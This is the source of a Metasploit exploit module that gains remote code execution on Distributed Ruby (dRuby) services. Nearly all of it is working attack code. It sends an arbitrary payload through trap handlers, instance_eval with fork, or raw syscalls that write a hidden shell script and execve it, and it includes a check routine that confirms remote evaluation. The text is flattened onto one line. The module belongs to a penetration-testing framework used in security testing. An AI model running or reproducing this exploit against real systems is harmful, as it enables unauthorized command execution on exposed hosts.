## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'drb/drb' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Distributed Ruby Remote Code Execution', 'Description' => %q{ This module exploits remote code execution vulnerabilities in dRuby. }, 'Author' => [ 'joernchen ' ], # (Phenoelit) 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ], [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ], [ 'URL', 'http://bugkraut.de/posts/tainting' ] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 32768 }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic', { method: 'auto' }], ['Trap', { method: 'trap' }], ['Eval', { method: 'instance_eval' }], ['Syscall', { method: 'syscall' }], ], 'DisclosureDate' => '2011-03-23', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RHOST, Opt::RPORT(8787) ] ) end def method_trap(p) p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") # Decide if this is running on an x86 or x64 target, using the kill(2) syscall begin pid = p.send(:syscall, 20) p.send(:syscall, 37, pid, 23) rescue Errno::EBADF # 64 bit system pid = p.send(:syscall, 39) p.send(:syscall, 62, pid, 23) end p.send(:my_eval, payload.encoded) end def method_instance_eval(p) p.send(:instance_eval, "Kernel.fork { `#{payload.encoded}` }") end def method_syscall(p) filename = '.' + Rex::Text.rand_text_alphanumeric(16) begin # Decide if this is running on an x86 or x64 target. # This syscall number is getpid on x86, which will succeed, # or writev on x64, which will fail due to missing args. j = p.send(:syscall, 20) # syscall open i = p.send(:syscall, 8, filename, 0o700) # syscall write p.send(:syscall, 4, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11) # syscall close p.send(:syscall, 6, i) # syscall fork p.send(:syscall, 2) sleep 2 # syscall execve p.send(:syscall, 11, filename, 0, 0) print_status("attempting x86 execve of #{filename}") # likely x64 rescue Errno::EBADF # syscall creat i = p.send(:syscall, 85, filename, 0o700) # syscall write p.send(:syscall, 1, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11) # syscall close p.send(:syscall, 3, i) # syscall fork p.send(:syscall, 57) sleep 2 # syscall execve p.send(:syscall, 59, filename, 0, 0) print_status("attempting x64 execve of #{filename}") end register_file_for_cleanup(filename) if filename end def rhost datastore['RHOST'] end def check begin pid = p.send(:syscall, 20) rescue Errno::EBADF # 64 bit system pid = p.send(:syscall, 39) rescue SecurityError, DRb::DRbConnError, NoMethodError return CheckCode::Safe end vprint_status("Service detected, syscall responded from pid #{pid}") val1 = rand(0xffff) val2 = rand(0xffff) begin result = p.send(:instance_eval, "#{val1} + #{val2}") rescue SecurityError, DRb::DRbConnError, NoMethodError end return CheckCode::Vulnerable if result == val1 + val2 CheckCode::Detected end def exploit serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" # DRb.start_service # this is unnecessary p = DRbObject.new_with_uri(serveruri) class << p undef :send end if target[:method] == 'auto' methods = %w[instance_eval syscall trap] else methods = [target[:method]] end methods.each do |method| begin print_status("Trying to exploit #{method} method") send('method_' + method, p) handler(nil) break rescue SecurityError, DRb::DRbConnError, NoMethodError print_warning("Target is not vulnerable to #{method} method") end end end end